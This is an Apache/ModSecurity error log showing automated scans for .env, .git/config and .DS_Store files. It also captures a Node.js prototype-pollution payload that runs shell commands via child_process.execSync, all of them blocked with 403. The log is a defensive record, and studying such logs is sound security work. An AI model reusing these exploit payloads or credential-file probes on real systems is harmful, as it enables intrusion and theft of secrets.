[Wed Dec 24 05:48:43.500282 2025] [authz_core:error] [pid 942141] [client 134.209.25.199:44576] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 24 05:48:46.505216 2025] [:error] [pid 942140] [client 134.209.25.199:44612] [client 134.209.25.199] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUtwroFODG4IWi8uxa11EAAAAAs"]
[Wed Dec 24 05:48:46.505453 2025] [:error] [pid 942140] [client 134.209.25.199:44612] [client 134.209.25.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUtwroFODG4IWi8uxa11EAAAAAs"]
[Wed Dec 24 05:48:46.505642 2025] [:error] [pid 942140] [client 134.209.25.199:44612] [client 134.209.25.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUtwroFODG4IWi8uxa11EAAAAAs"]
[Wed Dec 24 05:48:47.508829 2025] [:error] [pid 942100] [client 134.209.25.199:44804] [client 134.209.25.199] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUtwr_l7Z5lr6dAW68DeeQAAAAE"]
[Wed Dec 24 05:48:47.509057 2025] [:error] [pid 942100] [client 134.209.25.199:44804] [client 134.209.25.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUtwr_l7Z5lr6dAW68DeeQAAAAE"]
[Wed Dec 24 05:48:47.509203 2025] [:error] [pid 942100] [client 134.209.25.199:44804] [client 134.209.25.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUtwr_l7Z5lr6dAW68DeeQAAAAE"]
[Wed Dec 24 05:48:49.505494 2025] [:error] [pid 942139] [client 134.209.25.199:44812] [client 134.209.25.199] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUtwsWl4NZ4lMytUn3wXdgAAAAo"]
[Wed Dec 24 05:48:49.505718 2025] [:error] [pid 942139] [client 134.209.25.199:44812] [client 134.209.25.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUtwsWl4NZ4lMytUn3wXdgAAAAo"]
[Wed Dec 24 05:48:49.505866 2025] [:error] [pid 942139] [client 134.209.25.199:44812] [client 134.209.25.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUtwsWl4NZ4lMytUn3wXdgAAAAo"]
[Wed Dec 24 05:48:53.288923 2025] [authz_core:error] [pid 942151] [client 157.245.36.108:32988] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 24 05:48:56.300277 2025] [:error] [pid 942137] [client 157.245.36.108:33018] [client 157.245.36.108] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUtwuFz848j8rVCtVZepTQAAAAg"]
[Wed Dec 24 05:48:56.300502 2025] [:error] [pid 942137] [client 157.245.36.108:33018] [client 157.245.36.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUtwuFz848j8rVCtVZepTQAAAAg"]
[Wed Dec 24 05:48:56.300656 2025] [:error] [pid 942137] [client 157.245.36.108:33018] [client 157.245.36.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUtwuFz848j8rVCtVZepTQAAAAg"]
[Wed Dec 24 05:48:57.297966 2025] [:error] [pid 942139] [client 157.245.36.108:33022] [client 157.245.36.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUtwuWl4NZ4lMytUn3wXeAAAAAo"]
[Wed Dec 24 05:48:57.298214 2025] [:error] [pid 942139] [client 157.245.36.108:33022] [client 157.245.36.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUtwuWl4NZ4lMytUn3wXeAAAAAo"]
[Wed Dec 24 05:48:57.298393 2025] [:error] [pid 942139] [client 157.245.36.108:33022] [client 157.245.36.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUtwuWl4NZ4lMytUn3wXeAAAAAo"]
[Wed Dec 24 05:48:59.293515 2025] [:error] [pid 942100] [client 157.245.36.108:33034] [client 157.245.36.108] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUtwu_l7Z5lr6dAW68DeewAAAAE"]
[Wed Dec 24 05:48:59.293744 2025] [:error] [pid 942100] [client 157.245.36.108:33034] [client 157.245.36.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUtwu_l7Z5lr6dAW68DeewAAAAE"]
[Wed Dec 24 05:48:59.293905 2025] [:error] [pid 942100] [client 157.245.36.108:33034] [client 157.245.36.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUtwu_l7Z5lr6dAW68DeewAAAAE"]
[Wed Dec 24 06:22:43.257269 2025] [:error] [pid 942151] [client 18.184.167.69:58384] [client 18.184.167.69] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUt4oxZfX5YESfaQlc6tQAAAAAM"]
[Wed Dec 24 06:22:43.257769 2025] [:error] [pid 942151] [client 18.184.167.69:58384] [client 18.184.167.69] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUt4oxZfX5YESfaQlc6tQAAAAAM"]
[Wed Dec 24 06:22:43.258811 2025] [:error] [pid 942151] [client 18.184.167.69:58384] [client 18.184.167.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUt4oxZfX5YESfaQlc6tQAAAAAM"]
[Wed Dec 24 06:22:43.258971 2025] [:error] [pid 942151] [client 18.184.167.69:58384] [client 18.184.167.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUt4oxZfX5YESfaQlc6tQAAAAAM"]
[Wed Dec 24 06:50:30.267847 2025] [authz_core:error] [pid 942137] [client 206.189.95.232:53278] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 24 06:50:33.456499 2025] [:error] [pid 942105] [client 206.189.95.232:51060] [client 206.189.95.232] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUt_KcdsQCFJpQq98kMWZQAAAAU"]
[Wed Dec 24 06:50:33.456725 2025] [:error] [pid 942105] [client 206.189.95.232:51060] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUt_KcdsQCFJpQq98kMWZQAAAAU"]
[Wed Dec 24 06:50:33.456891 2025] [:error] [pid 942105] [client 206.189.95.232:51060] [client 206.189.95.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUt_KcdsQCFJpQq98kMWZQAAAAU"]
[Wed Dec 24 06:50:34.509697 2025] [:error] [pid 942101] [client 206.189.95.232:51070] [client 206.189.95.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUt_Ko3b3LRkWYPRjITTogAAAAI"]
[Wed Dec 24 06:50:34.509975 2025] [:error] [pid 942101] [client 206.189.95.232:51070] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUt_Ko3b3LRkWYPRjITTogAAAAI"]
[Wed Dec 24 06:50:34.510141 2025] [:error] [pid 942101] [client 206.189.95.232:51070] [client 206.189.95.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUt_Ko3b3LRkWYPRjITTogAAAAI"]
[Wed Dec 24 06:50:36.610096 2025] [:error] [pid 942151] [client 206.189.95.232:51080] [client 206.189.95.232] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUt_LBZfX5YESfaQlc6tTgAAAAM"]
[Wed Dec 24 06:50:36.610329 2025] [:error] [pid 942151] [client 206.189.95.232:51080] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUt_LBZfX5YESfaQlc6tTgAAAAM"]
[Wed Dec 24 06:50:36.610513 2025] [:error] [pid 942151] [client 206.189.95.232:51080] [client 206.189.95.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUt_LBZfX5YESfaQlc6tTgAAAAM"]
[Thu Dec 25 02:10:38.780679 2025] [:error] [pid 961655] [client 204.76.203.25:42872] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUyPDtkX5L4YEsGeXKdgJgAAAAA"]
[Thu Dec 25 02:10:38.781019 2025] [:error] [pid 961655] [client 204.76.203.25:42872] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUyPDtkX5L4YEsGeXKdgJgAAAAA"]
[Thu Dec 25 02:10:38.781192 2025] [:error] [pid 961655] [client 204.76.203.25:42872] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUyPDtkX5L4YEsGeXKdgJgAAAAA"]
[Thu Dec 25 10:00:54.862395 2025] [:error] [pid 964249] [client 120.245.128.96:48814] [client 120.245.128.96] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9Rtt8xMcTBghmXKuTsAAAABM"]
[Thu Dec 25 10:00:54.862536 2025] [:error] [pid 964249] [client 120.245.128.96:48814] [client 120.245.128.96] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = 